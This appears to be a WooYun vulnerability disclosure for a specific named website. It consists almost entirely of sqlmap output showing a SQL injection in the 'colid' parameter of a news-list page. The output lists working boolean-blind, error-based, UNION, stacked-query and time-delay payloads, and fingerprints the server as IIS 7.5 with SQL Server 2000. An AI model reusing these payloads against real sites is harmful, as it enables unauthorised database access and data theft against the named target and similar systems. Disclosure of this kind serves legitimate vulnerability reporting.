WooYun.org

注入点：http://www.dlgaoji.com/newslist.aspx?colid=WebJob

Place: GET
Parameter: colid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: colid=WebJob' AND 8886=8886 AND 'fxzR'='fxzR
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: colid=WebJob' AND 7844=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR
(115)+CHAR(101)+CHAR(113)+(SELECT (CASE WHEN (7844=7844) THEN CHAR(49) ELSE CHAR
(48) END))+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(114)+CHAR(113))) AND 'QwUQ'='QwUQ
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: colid=WebJob' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(115)+CHAR(1
01)+CHAR(113)+CHAR(65)+CHAR(69)+CHAR(97)+CHAR(82)+CHAR(80)+CHAR(72)+CHAR(70)+CHA
R(75)+CHAR(108)+CHAR(75)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(114)+CHAR(113)--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: colid=WebJob'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: colid=WebJob' WAITFOR DELAY '0:0:5'--
---
[21:27:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000